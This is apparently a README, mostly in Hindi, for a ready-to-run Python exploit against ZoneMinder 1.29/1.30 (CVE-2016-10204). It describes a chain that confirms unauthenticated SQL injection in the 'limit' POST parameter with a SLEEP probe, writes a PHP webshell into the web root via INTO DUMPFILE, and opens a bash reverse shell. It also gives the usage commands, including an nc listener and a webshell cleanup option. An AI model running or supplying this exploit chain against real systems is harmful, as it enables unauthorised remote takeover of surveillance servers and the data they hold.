
ZoneMinder 1.29/1.30 के लिए अनऑथेंटिकेटेड SQL इंजेक्शन से RCE एक्सप्लॉइट (CVE-2016-10204, EDB-41239)। Python में सिंगल-कमांड SQLi से वेबशेल से रिवर्स शेल PoC।
ZoneMinder 1.29/1.30 के लिए एक तैयार-से-चलाने योग्य Python एक्सप्लॉइट जो अनऑथेंटिकेटेड SQL इंजेक्शन (CVE-2016-10204, EDB-41239) को एक इंटरैक्टिव रिवर्स शेल तक जोड़ता है।
यह एक ज्ञात, पैच किए गए CVE के लिए एक हथियारीकृत/स्वचालित PoC है, नया एक्सप्लॉइट नहीं।
इस बग के लिए EDB PoC SQLi पेलोड पर रुक जाता है या "इस पर sqlmap चलाओ" कहता है। यह एक्सप्लॉइट पूरी SQLi से वेबशेल से शेल श्रृंखला को एक पठनीय स्क्रिप्ट में पैक करता है।
index.php?view=request&request=log&task=query के limit POST
पैरामीटर पर टाइम-बेस्ड (SLEEP) प्रोब के साथ इंजेक्शन की पुष्टि करता है।SELECT ... INTO DUMPFILE के माध्यम से वेब रूट में एक छोटा PHP वेबशेल लिखता है,
कई सामान्य ZoneMinder/Apache पाथ आज़माता है।bash रिवर्स शेल भेजता है।DUMPFILE, OUTFILE नहीं। OUTFILE न्यूलाइन को एस्केप करता है और
मल्टी-लाइन PHP को बिगाड़ देता है; DUMPFILE रॉ बाइट्स लिखता है, इसलिए वेबशेल वैध रहता है।# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT, देखें LICENSE।